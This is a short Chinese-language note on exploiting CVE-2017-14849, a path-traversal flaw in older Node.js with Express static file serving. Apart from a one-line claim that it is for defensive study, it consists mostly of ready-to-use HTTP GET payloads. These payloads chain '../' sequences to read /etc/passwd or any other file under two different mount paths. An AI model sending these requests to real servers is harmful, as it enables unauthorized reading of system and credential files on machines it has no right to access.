【笔记】CVE-2017-14849漏洞利用
前言
在Nodejs8.6之前的版本,使用Express框架,如果代码中出现express.static()
相关代码,可以实现CVE-2017-14849漏洞利用
本文仅用于网络信息防御学习
payload
- 如果挂载路径为
app.use('/', express.static(path.join(__dirname, 'static')))
,则payload如下
/etc/passwd
:任意文件
1 | GET /../../../a/../../../../etc/passwd |
- 如果挂载路径为
app.use('/static', express.static(path.join(__dirname, 'static')))
,则payload如下
/etc/passwd
:任意文件
1 | GET /static/../../../a/../../../../etc/passwd |